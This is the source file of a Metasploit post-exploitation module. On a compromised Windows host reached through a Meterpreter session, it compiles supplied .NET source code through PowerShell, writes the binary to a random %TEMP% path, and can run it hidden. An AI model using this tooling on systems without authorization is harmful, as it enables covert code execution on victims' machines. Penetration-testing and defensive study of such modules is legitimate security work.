GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/manage/powershell/build_net_code.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
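class MetasploitModule < Msf::Post
  Rank = ExcellentRanking

  include Msf::Post::Windows::Powershell
  include Msf::Exploit::Powershell::DotNet

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Powershell .NET Compiler',
        'Description' => %q{
          This module will build a .NET source file using powershell. The compiler builds
          the executable or library in memory and produces a binary. After compilation the
          PowerShell session can also sign the executable if provided a path the
          a .pfx formatted certificate. Compiler options and a list of assemblies
          required can be configured in the datastore.
        },
        'License' => MSF_LICENSE,
        'Author' => 'RageLtMan <rageltman[at]sempervictus>',
        'Platform' => [ 'windows' ],
        'SessionTypes' => [ 'meterpreter' ],
        'DisclosureDate' => '2012-08-14',
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_fs_stat
              stdapi_sys_config_getenv
              stdapi_sys_config_getsid
              stdapi_sys_process_execute
            ]
          }
        }
      )
    )

    register_options(
      [
        OptPath.new('SOURCE_FILE', [true, 'Path to source code']),
        OptBool.new('RUN_BINARY', [false, 'Execute the generated binary', false]),
        OptString.new('ASSEMBLIES', [false, 'Any assemblies outside the defaults', 'mscorlib.dll, System.dll, System.Xml.dll, System.Data.dll' ]),
        OptString.new('OUTPUT_TARGET', [false, 'Name and path of the generated binary, default random, omit extension' ]),
        OptString.new('COMPILER_OPTS', [false, 'Options to pass to compiler', '/optimize']),
        OptString.new('CODE_PROVIDER', [true, 'Code provider to use', 'Microsoft.CSharp.CSharpCodeProvider'])
      ], self.class
    )
    register_advanced_options(
      [
        OptString.new('NET_CLR_VER', [false, 'Minimum NET CLR version required to compile', '4.0'])
      ], self.class
    )
  end

  # Reads the local SOURCE_FILE, builds the PowerShell compiler script for it,
  # runs that script in the session, verifies the output binary exists and
  # optionally executes it (RUN_BINARY).
  #
  # Everything past the first guard uses meterpreter-only APIs
  # (client.sys.config, session.fs.file.stat, session.sys.process.execute) and
  # the compile itself goes through execute_script, which needs PowerShell, so
  # both conditions are required (the previous `||` let a non-meterpreter
  # session with PowerShell, or a meterpreter session without it, fall through
  # and fail later with a less helpful error).
  #
  # Returns 0 on an environment check failure, nil otherwise; the value is not
  # used by callers as far as this file shows.
  def run
    unless session.type == 'meterpreter' && have_powershell?
      print_error 'Incompatible Environment'
      return 0
    end

    # Havent figured this one out yet, but we need a PID owned by a user, can't steal tokens either
    if client.sys.config.is_system?
      print_error 'Cannot run as system'
      return 0
    end

    # Random markers handed to get_ps_output / clean_up so the script's own
    # output and environment can be told apart from ours.
    eof = Rex::Text.rand_text_alpha(8)
    env_suffix = Rex::Text.rand_text_alpha(8)

    net_com_opts = compiler_options

    begin
      net_com_opts[:harness] = ::File.read(datastore['SOURCE_FILE'])
      script = dot_net_compiler(net_com_opts)
      if datastore['Powershell::Post::dry_run']
        print_good "Compiler code:\n#{script}"
        return
      end
    rescue StandardError => e
      # Covers an unreadable SOURCE_FILE as well as failures inside dot_net_compiler.
      print_error e.message
      return
    end

    vprint_good "Writing to #{net_com_opts[:target]}"

    # Execute the powershell script
    print_status 'Building remote code.'
    cmd_out, running_pids, open_channels = execute_script(script, true)
    get_ps_output(cmd_out, eof)
    vprint_good "Cleaning up #{running_pids.join(', ')}"

    # Only the PowerShell processes/channels are cleaned up here; nothing in
    # this module removes the compiled binary from :target afterwards.
    clean_up(nil, eof, running_pids, open_channels, env_suffix, false)

    # The target is built with single backslashes for the PowerShell side; the
    # meterpreter file APIs below want them doubled, so escape once and reuse.
    target_path = net_com_opts[:target].gsub('\\', '\\\\')

    # Check for result
    begin
      size = session.fs.file.stat(target_path).size
      # stat size is a byte count, not kilobytes.
      print_good "File #{target_path} found, #{size} bytes"
    rescue StandardError
      print_error "File #{target_path} not found," \
                  " NET CLR version #{datastore['NET_CLR_VER']} possibly not available"
      return
    end

    run_binary(target_path) if datastore['RUN_BINARY']

    print_good 'Finished!'
  end

  private

  # Collects the datastore values dot_net_compiler consumes into one hash.
  # :target defaults to a random .exe name under the session's %TEMP%.
  # :cert reads CERT_PATH, which this module does not register itself;
  # presumably it comes from the DotNet mixin — verify if it is ever nil here.
  def compiler_options
    {
      target: datastore['OUTPUT_TARGET'] ||
              "#{session.sys.config.getenv('TEMP')}\\#{Rex::Text.rand_text_alpha(rand(8..15))}.exe",
      com_opts: datastore['COMPILER_OPTS'],
      provider: datastore['CODE_PROVIDER'],
      assemblies: datastore['ASSEMBLIES'],
      net_clr: datastore['NET_CLR_VER'],
      cert: datastore['CERT_PATH']
    }
  end

  # Executes the compiled binary hidden and channelized, relaying its output
  # until the channel returns nil (EOF).
  def run_binary(target_path)
    cmd_out = session.sys.process.execute(target_path, nil, 'Hidden' => true, 'Channelized' => true)
    while (out = cmd_out.channel.read)
      print_good out
    end
  end
end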